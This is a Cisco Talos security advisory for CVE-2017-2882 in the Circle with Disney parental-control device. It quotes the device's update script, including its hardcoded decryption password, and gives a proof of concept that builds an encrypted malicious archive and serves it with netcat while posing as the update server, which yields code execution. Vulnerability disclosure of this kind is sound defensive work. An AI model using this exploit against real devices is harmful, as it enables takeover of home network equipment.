Headline
CVE-2017-2882: TALOS-2017-0389 || Cisco Talos Intelligence Group
An exploitable vulnerability exists in the servers update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the device to overwrite sensitive files, resulting in code execution. An attacker needs to impersonate a remote server in order to trigger this vulnerability.
Summary
An exploitable vulnerability exists in the servers update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the device to overwrite sensitive files, resulting in code execution. An attacker needs to impersonate a remote server in order to trigger this vulnerability.
Tested Versions
Circle with Disney 2.0.1
Product URLs
https://meetcircle.com/
CVSSv3 Score
9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE
CWE-73: External Control of File Name or Path
Details
Circle with Disney is a network device used to monitor internet use of children on a given network.
A cronjob exists which executes the script “check_circleservers.sh” every 4 hours:
#!/bin/sh
MAC=`cat /tmp/MAC`;
VER=`cat /tmp/circleservers.ver`
CIRCLE_ROOT=`cat /tmp/CIRCLE_ROOT`
rm -f /tmp/circleservers.bin /tmp/circleserver.tgz
/tmp/wget -q -t 1 -T 30 -O /tmp/circleservers.bin "http://download.meetcircle.co/dev/firmware/get_circleservers.php?
DEVID=$MAC&VER=$VER" || exit
if [ -s /tmp/circleservers.bin ]; then
/tmp/aescrypt -d -p a801e2f7bd4104073a296dc5c63857cf -o /tmp/circleservers.tgz /tmp/circleservers.bin || exit
[ -s /tmp/circleservers.tgz ] || exit
cd /tmp/
tar zxf /tmp/circleservers.tgz
if [ -s /tmp/circleservers ]; then
$CIRCLE_ROOT/ipsetload circleservers /tmp/circleservers
cp -f /tmp/circleservers $CIRCLE_ROOT/scripts/circleservers.list
fi
fi
rm -f /tmp/circleservers.bin /tmp/circleservers.tgz
The script above downloads an encrypted tar archive using an HTTP request, which gets then decrypted and extracted in the “/tmp” directory. Since the encryption password is known and the http connection is not authenticated, an attacker able to impersonate the remote server could overwrite any file in the “/tmp” directory. Since the script itself executes “/tmp/aescrypt”, one of the ways to exploit this bug is to overwrite “aescrypt” with a custom executable: this allows an attacker to execute arbitrary code on the next call of the script.
Exploit Proof-of-Concept
The following proof of concept shows how to execute the “power_down.sh” script on the device. An attacker needs to impersonate the server “download.meetcircle.co” in order to answer to the HTTP requests.
$ echo "/mnt/shares/usr/bin/scripts/circle/power_down.sh" > aescrypt
$ chmod 777 aescrypt
$ tar czf evil.tgz aescrypt
$ aescrypt -e -p a801e2f7bd4104073a296dc5c63857cf -o evil.bin evil.tgz
$ ( echo -en "HTTP/1.0 200 OK\nContent-Length: $(stat -c%s evil.bin)\n\n"; cat evil.bin ) | sudo nc -vv -l -p 80
$ ( echo -en "HTTP/1.0 200 OK\nContent-Length: 1\n\nX" ) | sudo nc -vv -l -p 80
Timeline
2017-08-02 - Vendor Disclosure
2017-10-31 - Public Release
Discovered by Claudio Bozzato and Lilith Wyatt <(^_^)> of Cisco Talos.